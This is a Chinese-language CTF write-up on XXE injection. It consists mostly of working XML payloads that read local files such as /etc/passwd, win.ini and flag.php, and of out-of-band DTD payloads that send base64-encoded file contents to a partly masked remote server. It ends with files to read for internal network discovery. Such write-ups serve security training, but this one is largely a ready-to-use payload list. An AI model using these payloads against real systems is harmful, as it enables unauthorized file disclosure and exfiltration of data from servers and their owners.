XXE漏洞检测

http://web.jarvisoj.com:9882/
#实例演示一道CTF题目
#目的是获取/home/ctf/flag.txt的内容

• 经过多番测试确定存在xxe漏洞

要先修改Content-Type: application/xml
然后加入xml脚本即可
<!DOCTYPE foo [<!ENTITY test  SYSTEM "file:///etc/passwd" >]><foo>&test;</foo>

jianshu1.jpg

• 这里给出多个测试语句

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe1 [<!ELEMENT name ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>

<!DOCTYPE foo [<!ENTITY test  SYSTEM "file:///etc/passwd" >]><foo>&test;</foo>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe "66666666666666666666">]>
<foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>      #ctf读取文件
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>

• 引用远程服务器的dtd文件(burp数据包)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY  % xxe SYSTEM "http://120.xx.xx.xx/webshella1231b/b.dtd" >
%xxe;]>
<foo>&b;</foo>

• dtd文件内容（linux）

<!ENTITY b SYSTEM "file:///etc/passwd">

• payload3.dtd(linux)

#burp发送的数据包
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://120.27.xx.xx/webshella1231b/payload3.dtd">
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>&xxe;</description>
   </core>
</catalog>
#dtd文件内容
<!ENTITY % file SYSTEM php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % all "<!ENTITY xxe SYSTEM 'http://120.27.xx.xx/webshella1231b/?%file;'>">
%all;

• payload2(win)

发送的burp数据包
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://120.27.xx.xx/webshella1231b/payload2.dtd">
%remote;%int;%send;
]>
#dtd文件内容
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/phpStudy/WWW/robots.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://120.27.xx.xx/webshella1231b/?%file;'>">

• HTTP 内网主机探测

尝试读取 
/etc/network/interfaces 
/proc/net/arp 
/etc/host 文件